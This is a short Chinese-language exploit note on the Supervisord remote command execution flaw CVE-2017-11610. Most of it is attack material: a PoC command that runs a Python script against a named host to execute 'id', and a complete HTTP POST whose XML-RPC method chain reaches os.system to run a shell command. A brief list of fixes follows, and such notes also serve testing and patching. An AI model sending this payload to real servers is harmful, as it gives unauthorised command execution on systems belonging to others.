跳转至

Supervisord

Supervisord 远程命令执行漏洞(CVE-2017-11610)

介绍: Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd,默认监听9001端口

poc: python 3 执行Supervisord.py

python Supervisord.py "http://lich.tk:9001/RPC2" "id"
title

另一种方法: 这种方法没有回显

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
title title


修复方案:

1、升级Supervisord 2、端口访问控制 3、设置复杂RPC密码

title